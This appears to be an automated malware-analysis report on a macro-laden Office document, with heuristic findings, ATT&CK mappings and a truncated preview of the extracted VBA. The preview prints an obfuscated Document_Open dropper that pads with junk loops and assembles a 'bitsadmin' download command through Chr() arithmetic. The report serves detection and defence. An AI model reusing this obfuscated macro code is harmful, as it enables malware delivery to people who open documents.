Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. The presence of a Document_Open macro, a Shell() call, and a CreateObject call strongly indicates malicious intent. The VBA script likely uses these functions to download and execute a secondary payload, a common technique for malware delivery.

Heuristics (7)
- VBA macros detected (medium, 5 related findings). OLE_VBA_MACROS: Document contains VBA macro code.
- Shell() call in VBA (critical). OLE_VBA_SHELL: Shell() call in VBA.
- Document_Open macro (high). OLE_VBA_DOCOPEN: Document_Open macro.
- CreateObject call (high). OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens (high). OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low). OLE_VBA_ENVIRON: Environ() call (env variable access).
- Embedded URL (info). EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43608 bytes |

SHA-256: 67626604e6a8d43261b93b9d09fea98583063e93cd9ccc27f90c36afb75ff9f3

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim tivSqQ As Integer tivSqQ = 4943 Do While 6833 > tivSqQ tivSqQ = tivSqQ + 1 Loop Dim tcBPEFnTmFHAss As Integer tcBPEFnTmFHAss = 3591 Do While 8395 > tcBPEFnTmFHAss tcBPEFnTmFHAss = tcBPEFnTmFHAss + 1 Loop Dim HAFIpgBizlNy As Integer HAFIpgBizlNy = 2408 Do While 4130 > HAFIpgBizlNy HAFIpgBizlNy = HAFIpgBizlNy + 1 Loop Dim YlLwvXBjaEKVhN As Integer YlLwvXBjaEKVhN = 3042 Do While 3726 > YlLwvXBjaEKVhN YlLwvXBjaEKVhN = YlLwvXBjaEKVhN + 1 Loop Dim nkGYa As Integer nkGYa = 2117 Do While 4150 > nkGYa nkGYa = nkGYa + 1 Loop Dim KdhCxFanFRoEqa As Integer KdhCxFanFRoEqa = 2075 Do While 4761 > KdhCxFanFRoEqa KdhCxFanFRoEqa = KdhCxFanFRoEqa + 1 Loop Dim mpviU As Integer mpviU = 4296 Do While 5720 > mpviU mpviU = mpviU + 1 Loop Dim DMBATmt As String Dim eImrUZddtxqsIbd As Integer eImrUZddtxqsIbd = 3963 Do While 6158 > eImrUZddtxqsIbd eImrUZddtxqsIbd = eImrUZddtxqsIbd + 1 Loop Dim NXXQGDjYtsr As Integer NXXQGDjYtsr = 1814 Do While 5982 > NXXQGDjYtsr NXXQGDjYtsr = NXXQGDjYtsr + 1 Loop Dim HCuGkOkg As Integer HCuGkOkg = 1440 Do While 1732 > HCuGkOkg HCuGkOkg = HCuGkOkg + 1 Loop Dim ttyOAPwReO As Integer ttyOAPwReO = 4383 Do While 6529 > ttyOAPwReO ttyOAPwReO = ttyOAPwReO + 1 Loop Dim QHZtoyLXUNqee As Integer QHZtoyLXUNqee = 4365 Do While 7399 > QHZtoyLXUNqee QHZtoyLXUNqee = QHZtoyLXUNqee + 1 Loop Dim YqyQNmwFDQYQ As Integer YqyQNmwFDQYQ = 1321 Do While 4121 > YqyQNmwFDQYQ YqyQNmwFDQYQ = YqyQNmwFDQYQ + 1 Loop Dim vijvXm As Integer vijvXm = 1261 Do While 4287 > vijvXm vijvXm = vijvXm + 1 Loop Dim Xmxngp As Integer Xmxngp = 2436 Do While 6804 > Xmxngp Xmxngp = Xmxngp + 1 Loop Dim lyEieVLkRpt As Integer lyEieVLkRpt = 1266 Do While 5811 > lyEieVLkRpt lyEieVLkRpt = lyEieVLkRpt + 1 Loop Dim 
sVKvwmzWoshIuHI As Integer sVKvwmzWoshIuHI = 1574 Do While 4105 > sVKvwmzWoshIuHI sVKvwmzWoshIuHI = sVKvwmzWoshIuHI + 1 Loop Dim EkdnL As Integer EkdnL = 4254 Do While 5959 > EkdnL EkdnL = EkdnL + 1 Loop Dim NMUnKArvequvRLT As Integer NMUnKArvequvRLT = 2727 Do While 3079 > NMUnKArvequvRLT NMUnKArvequvRLT = NMUnKArvequvRLT + 1 Loop Dim zqznnT As Integer zqznnT = 4135 Do While 5956 > zqznnT zqznnT = zqznnT + 1 Loop DMBATmt = Chr(96 + 2) & Chr(50 + 55) & Chr(6 + 110) & Chr(17 + 98) & Chr(97 + 0) Dim zBbsFqnojroGHpF As Integer zBbsFqnojroGHpF = 3707 Do While 7490 > zBbsFqnojroGHpF zBbsFqnojroGHpF = zBbsFqnojroGHpF + 1 Loop Dim jWHkJGbKpPn As Integer jWHkJGbKpPn = 4916 Do While 7829 > jWHkJGbKpPn jWHkJGbKpPn = jWHkJGbKpPn + 1 Loop Dim Pratosg As Integer Pratosg = 4218 Do While 6848 > Pratosg Pratosg = Pratosg + 1 Loop Dim fhFLrqBZ As Integer fhFLrqBZ = 3838 Do While 6146 > fhFLrqBZ fhFLrqBZ = fhFLrqBZ + 1 Loop Dim HDWmCjULI As Integer HDWmCjULI = 4689 Do While 8798 > HDWmCjULI HDWmCjULI = HDWmCjULI + 1 Loop Dim cbQEupfJaGjGJ As Integer cbQEupfJaGjGJ = 4628 Do While 7397 > cbQEupfJaGjGJ cbQEupfJaGjGJ = cbQEupfJaGjGJ + 1 Loop Dim zrrSOmF As Integer zrrSOmF = 1037 Do While 5596 > zrrSOmF zrrSOmF = zrrSOmF + 1 Loop Dim pGsoRaKs As Integer pGsoRaKs = 4677 Do While 8927 > pGsoRaKs pGsoRaKs = pGsoRaKs + 1 Loop Dim iuadUoSpIOIBII As Integer iuadUoSpIOIBII = 3110 Do While 6837 > iuadUoSpIOIBII iuadUoSpIOIBII = iuadUoSpIOIBII + 1 Loop Dim UIdjdKPCaJr As Integer UIdjdKPCaJr = 3136 Do While 7735 > UIdjdKPCaJr UIdjdKPCaJr = UIdjdKPCaJr + 1 Loop DMBATmt = DMBATmt & Chr(71 + 29) & Chr(103 + 6) & Chr(61 + 44) & Chr(104 + 6) & Chr(26 + 6) Dim giOHwbuNPdh As Integer giOHwbuNPdh = 2494 Do While 5812 > giOHwbuNPdh giOHwbuNPdh = giOHwbuNPdh + 1 Loop Dim oBVKdpeYKDhBYNo As Integer oBVKdpeYKDhBYNo = 4915 Do While 6499 > oBVKdpeYKDhBYNo oBVKdpeYKDhBYNo = oBVKdpeYKDhBYNo + 1 Loop Dim gGWLhoN As Integer gGWLhoN = 4335 ... (truncated) |